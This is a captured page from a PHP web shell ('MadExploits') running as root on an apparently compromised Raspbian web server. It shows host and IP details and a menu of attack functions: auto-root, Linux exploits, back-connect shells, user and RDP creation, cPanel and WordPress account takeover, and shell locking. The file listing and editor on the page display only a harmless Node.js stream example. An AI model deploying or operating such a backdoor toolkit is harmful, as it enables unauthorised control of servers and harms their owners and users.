Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-readable-stream /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
capslocktyper.js
747
B
-rw-r--r--
typer.js
416
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : capslocktyper.js
var Transform = require('readable-stream/transform'); var inherits = require('util').inherits; // subclass function MyStream () { Transform.call(this, { lowWaterMark: 0, encoding: 'utf8' }); } inherits(MyStream, Transform); MyStream.prototype._transform = function (chunk, outputFn, callback) { outputFn(new Buffer(String(chunk).toUpperCase())); callback(); }; // use it! var s = new MyStream(); process.stdin.resume(); process.stdin.pipe(s).pipe(process.stdout); if (process.stdin.setRawMode) process.stdin.setRawMode(true); process.stdin.on('data', function (c) { c = c.toString(); if (c === '\u0003' || c === '\u0004') { process.stdin.pause(); s.end(); } if (c === '\r') process.stdout.write('\n'); });
Close